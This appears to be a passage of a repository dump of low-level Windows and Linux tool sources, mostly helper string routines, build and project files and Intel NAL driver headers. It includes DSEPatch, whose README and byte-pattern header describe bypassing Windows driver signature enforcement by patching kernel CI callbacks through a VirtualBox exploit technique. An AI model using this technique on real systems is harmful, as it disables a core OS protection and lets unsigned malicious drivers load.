10; 32 | r++; 33 | } 34 | 35 | if (s == 0) 36 | return r; 37 | 38 | for (i = r; i != 0; i--) { 39 | s[i-1] = (wchar_t)(x % 10) + L'0'; 40 | x /= 10; 41 | } 42 | 43 | s[r] = (wchar_t)0; 44 | return r; 45 | } 46 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/ultohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultohex_a(unsigned long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 8; 10 | 11 | for (c=0; c<8; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[7-c] = p; 21 | } 22 | 23 | s[8] = 0; 24 | return 8; 25 | } 26 | 27 | size_t ultohex_w(unsigned long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 8; 34 | 35 | for (c=0; c<8; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[7-c] = p; 45 | } 46 | 47 | s[8] = 0; 48 | return 8; 49 | } 50 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/ultostr.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultostr_a(unsigned long x, char *s) 4 | { 5 | unsigned long t=x; 6 | size_t i, r=1; 7 | 8 | while ( t >= 10 ) { 9 | t /= 10; 10 | r++; 11 | } 12 | 13 | if (s == 0) 14 | return r; 15 | 16 | for (i = r; i != 0; i--) { 17 | s[i-1] = (char)(x % 10) + '0'; 18 | x /= 10; 19 | } 20 | 21 | s[r] = (char)0; 22 | return r; 23 | } 24 | 25 | size_t ultostr_w(unsigned long x, wchar_t *s) 26 | { 27 | unsigned long t=x; 28 | size_t i, r=1; 29 | 30 | while ( t >= 10 ) { 31 | t /= 10; 32 | r++; 33 | } 34 | 35 | if (s == 0) 36 | return r; 37 | 38 | for (i = r; i != 0; i--) { 39 | s[i-1] = (wchar_t)(x % 10) + L'0'; 40 | x /= 10; 41 | } 42 | 43 | s[r] = (wchar_t)0; 44 | return r; 45 | } 46 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DSEPatch/DSEPatch/resource.rc -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/se_patterns.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019 4 | * 5 | * TITLE: SE_PATTERNS.H 6 | * 7 | * VERSION: 1.05 8 | * 9 | * DATE: 22 Jan 2019 10 | * 11 | * Header with search patterns used by DSEPatch. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | 20 | #pragma once 21 | 22 | 23 | /*+++ 24 | 25 | SeCiCallbacks search patterns 26 | 27 | +++*/ 28 | 29 | //Windows 10 TH1/TH2 30 | BYTE SeCiCallbacksPattern_10240_10586[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0x98, 0x00, 0x00, 0x00 }; 31 | 32 | //Windows 10 RS1 33 | BYTE SeCiCallbacksPattern_14393[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xB0, 0x00, 0x00, 0x00 }; 34 | 35 | //Windows 10 RS2/RS3 36 | BYTE SeCiCallbacksPattern_15063_16299[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xC0, 0x00, 0x00, 0x00 }; 37 | 38 | //Windows 10 RS4/RS5 39 | BYTE SeCiCallbacksPattern_17134_17763[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xD0, 0x00, 0x00, 0x00 }; 40 | 41 | //Windows 8/8.1 42 | BYTE SeCiCallbacksPattern_9200_9600[] = { 0x48, 0x83, 0xEC, 0x20, 0xBF, 0x06, 0x00, 0x00, 0x00 }; 43 | 44 | BYTE SeCiCallbacksMatchingPattern[] = { 0x48, 0x8D, 0x0D }; 45 | 46 | //Windows 7 47 | BYTE g_CiCallbacksPattern_7601[] = { 0x8D, 0x7B, 0x06, 0x48, 0x89, 0x05 }; 48 | BYTE g_CiCallbacksMatchingPattern[] = { 0x48, 0x89, 0x05 }; 49 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/sup.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019 4 | * 5 | * TITLE: SUP.H 6 | * 7 | * VERSION: 1.00 8 | * 9 | * DATE: 23 Jan 2019 10 | * 11 | * Common header file for the program support routines. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); 22 | 23 | typedef struct _OBJSCANPARAM { 24 | PWSTR Buffer; 25 | ULONG BufferSize; 26 | } OBJSCANPARAM, *POBJSCANPARAM; 27 | 28 | void supCopyMemory( 29 | _Inout_ void *dest, 30 | _In_ size_t ccdest, 31 | _In_ const void *src, 32 | _In_ size_t ccsrc); 33 | 34 | PVOID supGetSystemInfo( 35 | _In_ SYSTEM_INFORMATION_CLASS InfoClass); 36 | 37 | BOOL supBackupVBoxDrv( 38 | _In_ BOOL bRestore); 39 | 40 | DWORD supWriteBufferToFile( 41 | _In_ LPWSTR lpFileName, 42 | _In_ PVOID Buffer, 43 | _In_ DWORD BufferSize); 44 | 45 | BOOL supIsObjectExists( 46 | _In_ LPWSTR RootDirectory, 47 | _In_ LPWSTR ObjectName); 48 | 49 | ULONG_PTR supGetModuleBaseByName( 50 | _In_ LPSTR ModuleName); 51 | 52 | ULONG_PTR supGetNtOsBase( 53 | VOID); 54 | 55 | BOOL supIsVBoxInstalled( 56 | VOID); 57 | 58 | PVOID supLookupImageSectionByName( 59 | _In_ CHAR* SectionName, 60 | _In_ ULONG SectionNameLength, 61 | _In_ PVOID DllBase, 62 | _Out_ PULONG SectionSize); 63 | 64 | ULONG_PTR supFindCiCallbacks( 65 | _In_ ULONG NtBuildNumber, 66 | _In_ ULONG NtOsSize, 67 | _In_ ULONG_PTR NtOsBase, 68 | _In_ HMODULE hNtOs); 69 | 70 | PVOID supFindPattern( 71 | _In_ CONST PBYTE Buffer, 72 | _In_ SIZE_T BufferSize, 73 | _In_ CONST PBYTE Pattern, 74 | _In_ SIZE_T PatternSize); 75 | 76 | ULONG supSizeOfProc( 77 | _In_ PBYTE FunctionPtr); 78 | 79 | ULONG_PTR supGetProcAddress( 80 | _In_ ULONG_PTR KernelBase, 81 | _In_ ULONG_PTR KernelImage, 82 | _In_ LPCSTR FunctionName); 83 | 84 | #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) 85 | -------------------------------------------------------------------------------- /source/DSEPatch/README.md: -------------------------------------------------------------------------------- 1 | 2 | # DSEPatch 3 | ## Windows x64 Driver Signature Enforcement Overrider 4 | 5 | # System Requirements 6 | 7 | x64 Windows Vista/7/8/8.1/10. 8 | 9 | Windows 10: warning, see PatchGuard note below. 10 | 11 | DSEPatch designed only for x64 Windows. 12 | 13 | Administrative privilege is required. 14 | 15 | Obsolete, do not use, see PatchGuard note below. 16 | 17 | # Build 18 | 19 | DSEPatch comes with full source code. 20 | In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. 21 | 22 | # How it work 23 | 24 | It uses WinNT/Turla VirtualBox kernel mode exploit technique to "patch" ntoskrnl callback structure filled by CI.dll. It is named g_CiCallbacks on Windows 7 and SeCiCallbacks on everything above. DSEPatch replaces CiValidateImageHeader and CiValidateImageData callbacks in this structure with stub routine that always return STATUS_SUCCESS. Original state can be restored - run dsepatch with -r command, e.g. dsepatch -r 25 | 26 | AS-IS, no warranty. 27 | 28 | # PatchGuard incompatibility 29 | 30 | Windows 10 PatchGuard is aware of this. Bugcheck is 109, 0 - generic data region. 31 | 32 | # Authors 33 | 34 | (c) 2016 - 2019 DSEPatch Project 35 | -------------------------------------------------------------------------------- /source/DSEPatch/changelog.txt: -------------------------------------------------------------------------------- 1 | 1.0.1 02 Aug 2016 2 | Initial release 3 | 4 | 1.0.2 14 Apr 2017 5 | Added offsets for RS2, rtls update 6 | 7 | 1.0.3 11 Oct 2017 8 | Added offsets for RS3 9 | 10 | 1.0.4 01 May 2018 11 | Added offset for RS4 12 | 13 | 1.0.5 22 Jan 2019 14 | Added offset for RS5, reacreated in vs17 and did rearrage, rtls update, make it public 15 | -------------------------------------------------------------------------------- /source/DrvTools/readme.txt: -------------------------------------------------------------------------------- 1 | DrvTools 1.0.2303 2 | Build with Lazarus FPC v3.2.2 3 | -------------------------------------------------------------------------------- /source/DrvTools/src/DrvTools.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/DrvTools.ico -------------------------------------------------------------------------------- /source/DrvTools/src/DrvTools.lpr: -------------------------------------------------------------------------------- 1 | program DrvTools; 2 | 3 | {$mode objfpc}{$H+} 4 | 5 | uses 6 | {$IFDEF UNIX}{$IFDEF UseCThreads} 7 | cthreads, 8 | {$ENDIF}{$ENDIF} 9 | Interfaces, // this includes the LCL widgetset 10 | Forms, Unit1, scmsup, nativesup; 11 | 12 | {$R *.res} 13 | 14 | begin 15 | RequireDerivedFormResource:=True; 16 | Application.Scaled:=True; 17 | Application.Initialize; 18 | Application.CreateForm(TMainForm, MainForm); 19 | Application.Run; 20 | end. 21 | 22 | -------------------------------------------------------------------------------- /source/DrvTools/src/DrvTools.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/DrvTools.res -------------------------------------------------------------------------------- /source/DrvTools/src/ppas.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | SET THEFILE=C:\Work\DrvTools\DrvTools32.exe 3 | echo Linking %THEFILE% 4 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\ld.exe -b pei-i386 -m i386pe --gc-sections -s --subsystem windows --entry=_WinMainCRTStartup -o C:\Work\DrvTools\DrvTools32.exe C:\Work\DrvTools\link.res 5 | if errorlevel 1 goto linkend 6 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\postw32.exe --subsystem gui --input C:\Work\DrvTools\DrvTools32.exe --stack 16777216 7 | if errorlevel 1 goto linkend 8 | goto end 9 | :asmend 10 | echo An error occurred while assembling %THEFILE% 11 | goto end 12 | :linkend 13 | echo An error occurred while linking %THEFILE% 14 | :end 15 | -------------------------------------------------------------------------------- /source/DrvTools/src/rsrc/about64.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/rsrc/about64.ico -------------------------------------------------------------------------------- /source/DrvTools/src/rsrc/main.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/rsrc/main.ico -------------------------------------------------------------------------------- /source/IntelNal/Kconfig: -------------------------------------------------------------------------------- 1 | config INTEL_IQVANDROID 2 | tristate "iqvandroid kernel driver for BYT MFG tools" 3 | default n 4 | help 5 | Select this module for support BYT MFG tools. 6 | 7 | -------------------------------------------------------------------------------- /source/IntelNal/Makefile: -------------------------------------------------------------------------------- 1 | iqvandroid-objs := \ 2 | src/linuxnaldriver.o \ 3 | src/linuxdriverpci_i.o \ 4 | src/linuxdriveros_i.o \ 5 | src/linuxdriverdevice_i.o \ 6 | src/nalioctldrv.o 7 | 8 | EXTRA_CFLAGS := \ 9 | -DNAL_LINUX -DNAL_LINUX_ANDROID -DNAL_DRIVER -DLINUX -D__KERNEL__ -DMODULE \ 10 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/ \ 11 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/linux \ 12 | 13 | obj-$(CONFIG_INTEL_IQVANDROID) = iqvandroid.o 14 | -------------------------------------------------------------------------------- /source/IntelNal/README.md: -------------------------------------------------------------------------------- 1 | Intel QV Linux kernel driver, see COPYING for more info 2 | -------------------------------------------------------------------------------- /source/IntelNal/inc/linux/linuxdriverdevice_i.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Intel QV Linux kernel driver 3 | * Copyright (c) 1999 - 2013, Intel Corporation. 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms and conditions of the GNU General Public License, 7 | * version 2, as published by the Free Software Foundation. 8 | * 9 | * This program is distributed in the hope it will be useful, but WITHOUT 10 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 11 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 12 | * more details. 13 | * 14 | * You should have received a copy of the GNU General Public License along with 15 | * this program; if not, write to the Free Software Foundation, Inc., 16 | * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA. 17 | * 18 | */ 19 | 20 | /* 21 | * Module Name: 22 | * linuxdriverdevice_i.h 23 | * 24 | * Abstract: 25 | * This file contains Linux Specific OS functions that are required 26 | * to correctly communicate with a device in Linux. 27 | */ 28 | 29 | 30 | #ifndef _LINUXDRIVERDEVICE_I_H_ 31 | #define _LINUXDRIVERDEVICE_I_H_ 32 | 33 | #include 34 | #include 35 | 36 | BOOLEAN 37 | _NalMarkAdapterInUse( 38 | IN NAL_DEVICE_LOCATION NalDevice, 39 | IN BOOLEAN Lock 40 | ); 41 | 42 | typedef struct _NAL_OS_SPECIFIC_DEVICE 43 | { 44 | UINT32 ReferenceCount; 45 | } NAL_OS_SPECIFIC_DEVICE; 46 | 47 | #define _NalReadPortOs8(a,p) NalReadPort8(p) 48 | #define _NalReadPortOs16(a,p) NalReadPort16(p) 49 | #define _NalReadPortOs32(a,p) NalReadPort32(p) 50 | #define _NalWritePortOs8(a,p,v) NalWritePort8(p,v) 51 | #define _NalWritePortOs16(a,p,v) NalWritePort16(p,v) 52 | #define _NalWritePortOs32(a,p,v) NalWritePort32(p,v) 53 | #define _NalReadRegisterOs8(a,d) NalReadRegister8(d) 54 | #define _NalReadRegisterOs16(a,d) NalReadRegister16(d) 55 | #define _NalReadRegisterOs32(a,d) NalReadRegister32(d) 56 | #define _NalWriteRegisterOs8(a,d,v) NalWriteRegister8(d,v) 57 | #define _NalWriteRegisterOs16(a,d,v) NalWriteRegister16(d,v) 58 | #define _NalWriteRegisterOs32(a,d,v) NalWriteRegister32(d,v) 59 | 60 | KVOID* 61 | _NalAllocateMemoryNonPagedPci( 62 | IN KVOID* PDev, 63 | IN UINT32 ByteCount, 64 | IN UINT32 Alignment, 65 | OUT NAL_PHYSICAL_ADDRESS* PhysicalAddress, 66 | IN CHAR* NamedLocator, 67 | IN UINT32 LineNumber 68 | ); 69 | 70 | VOID 71 | NalFreeMemoryNonPagedPci( 72 | IN KVOID* PDev, 73 | IN KVOID* Address, 74 | IN NAL_PHYSICAL_ADDRESS PhysicalAddress, 75 | IN UINT32 Size 76 | ); 77 | 78 | #endif 79 | -------------------------------------------------------------------------------- /source/IntelNal/src/iqvlinux.spec: -------------------------------------------------------------------------------- 1 | Summary: QV Tools driver 2 | Name: iqvlinux 3 | Version: 1.1.4.5 4 | Release: 0 5 | BuildArch: noarch 6 | License: GPL 7 | Vendor: Intel 8 | Group: System Environment/Kernel 9 | URL: http://www.intel.com 10 | 11 | Source: iqvlinux.tar.gz 12 | BuildRoot: %{_tmppath}/%{name}-%{version}-root 13 | 14 | 15 | %description 16 | Network adapter driver for QV Tools. 17 | 18 | %prep 19 | %setup -c %{name} -n %{name} 20 | 21 | %build 22 | 23 | %install 24 | if [ -d %{buildroot} ]; then 25 | rm -fr %{buildroot} 26 | fi 27 | mkdir -p %{buildroot}/%{_datadir}/%{name}-%{version}-root 28 | make -f Makefile -C src/linux/driver \ 29 | NALDIR=/usr/src/redhat/BUILD/%{name} \ 30 | DESTDIR=%{buildroot}/%{_datadir}/%{name}-%{version}-root installrpm 31 | 32 | %post 33 | # V=1 if you want verbose output 34 | make -f Makefile -C %{_datadir}/%{name}-%{version}-root/src/linux/driver \ 35 | NALDIR=%{_datadir}/%{name}-%{version}-root/ 36 | %{_datadir}/%{name}-%{version}-root/src/linux/driver/nalinstall %{_datadir}/%{name}-%{version}-root/src/linux/driver 37 | rm -fr %{_datadir}/%{name}-%{version}-root/* 38 | 39 | %verifyscript 40 | if [ ! -e /lib/modules/`uname -r`/kernel/drivers/net/iqvlinux.ko ] 41 | then 42 | echo "QV Linux Driver is missing" 43 | exit 1 44 | fi 45 | 46 | %clean 47 | rm -fr %{buildroot} 48 | 49 | %files 50 | %defattr(-, root, root, 0755) 51 | %{_datadir}/%{name}-%{version}-root/ 52 | 53 | %changelog 54 | * %(date "+%a %b %d %Y") %name %{version} 55 | - Automatic build. 56 | -------------------------------------------------------------------------------- /source/IntelNal/src/nalinstall: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Copyright(c) 1999 - 2013 Intel Corporation. All rights reserved. 4 | # 5 | # This program is free software; you can redistribute it and/or modify 6 | # it under the terms of version 2 of the GNU General Public License as 7 | # published by the Free Software Foundation. 8 | # 9 | # This program is distributed in the hope that it will be useful, but 10 | # WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | # General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program; if not, write to the Free Software 16 | # Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA. 17 | # The full GNU General Public License is included in this distribution 18 | # in the file called LICENSE.GPL. 19 | # 20 | # Contact Information: 21 | # e1000-devel Mailing List 22 | # Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497 23 | 24 | if [ "$1" = "" ] 25 | then 26 | SOURCE_DIR=$PWD 27 | else 28 | SOURCE_DIR=$1 29 | fi 30 | 31 | MachineType=$(uname -i) 32 | KernelVersion=$(uname -r) 33 | 34 | K_VERSION=`uname -r| cut -c1-3 | sed 's/2\.[56]/2\.6/'` 35 | 36 | DriverName=iqvlinux 37 | if [ "$K_VERSION" = "2.4" ] 38 | then 39 | DriverFileName=$DriverName.o 40 | else 41 | DriverFileName=$DriverName.ko 42 | fi 43 | 44 | rm -f /lib/modules/$KernelVersion/kernel/drivers/net/$DriverFileName 45 | cp $SOURCE_DIR/$DriverFileName /lib/modules/$KernelVersion/kernel/drivers/net 46 | # Install the node and driver 47 | echo "Try and unload the old driver..." 48 | rmmod -s $DriverName 49 | echo "Installed!!" 50 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.168 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "srvany", "srvany2\srvany2.vcxproj", "{DA2D114B-786B-4999-8338-7D2A772EAE69}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.ActiveCfg = Debug|Win32 15 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.Build.0 = Debug|Win32 16 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.ActiveCfg = Release|Win32 17 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {9159E424-291B-45AC-B085-CD7D7837B77D} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/cmdline.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMDLINEH_ 2 | #define _CMDLINEH_ 3 | 4 | BOOL GetCommandLineParamW( 5 | IN LPCWSTR CmdLine, 6 | IN ULONG ParamIndex, 7 | OUT LPWSTR Buffer, 8 | IN ULONG BufferSize, 9 | OUT PULONG ParamLen 10 | ); 11 | 12 | BOOL GetCommandLineParamA( 13 | IN LPCSTR CmdLine, 14 | IN ULONG ParamIndex, 15 | OUT LPSTR Buffer, 16 | IN ULONG BufferSize, 17 | OUT PULONG ParamLen 18 | ); 19 | 20 | char *ExtractFilePathA(const char *FileName, char *FilePath); 21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); 22 | 23 | #ifdef UNICODE 24 | 25 | #define ExtractFilePath ExtractFilePathW 26 | #define GetCommandLineParam GetCommandLineParamW 27 | 28 | #else // ANSI 29 | 30 | #define ExtractFilePath ExtractFilePathA 31 | #define GetCommandLineParam GetCommandLineParamA 32 | 33 | #endif 34 | 35 | #endif /* _CMDLINEH_ */ 36 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/srvany2.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {193b68bc-13ea-43ca-9f81-6a739b38bb42} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | minirtl 26 | 27 | 28 | minirtl 29 | 30 | 31 | minirtl 32 | 33 | 34 | minirtl 35 | 36 | 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | minirtl 46 | 47 | 48 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/srvany2.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\new\zoomit.exe "-win32k -sc 1024 -pc 1024 logn" 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29519.87 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "win32u", "win32u\win32u.vcxproj", "{8AF1DA16-D7F8-4814-BF5D-526456A574B2}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | ReleaseForChecked|x86 = ReleaseForChecked|x86 13 | EndGlobalSection 14 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 15 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.ActiveCfg = Debug|Win32 16 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.Build.0 = Debug|Win32 17 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.ActiveCfg = Release|Win32 18 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.Build.0 = Release|Win32 19 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.ActiveCfg = ReleaseForChecked|Win32 20 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.Build.0 = ReleaseForChecked|Win32 21 | EndGlobalSection 22 | GlobalSection(SolutionProperties) = preSolution 23 | HideSolutionNode = FALSE 24 | EndGlobalSection 25 | GlobalSection(ExtensibilityGlobals) = postSolution 26 | SolutionGuid = {487B1FDE-0E17-47E1-80E2-16076184F850} 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /source/ROS/win32u/win32u/main.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT hfiref0x, 2018 - 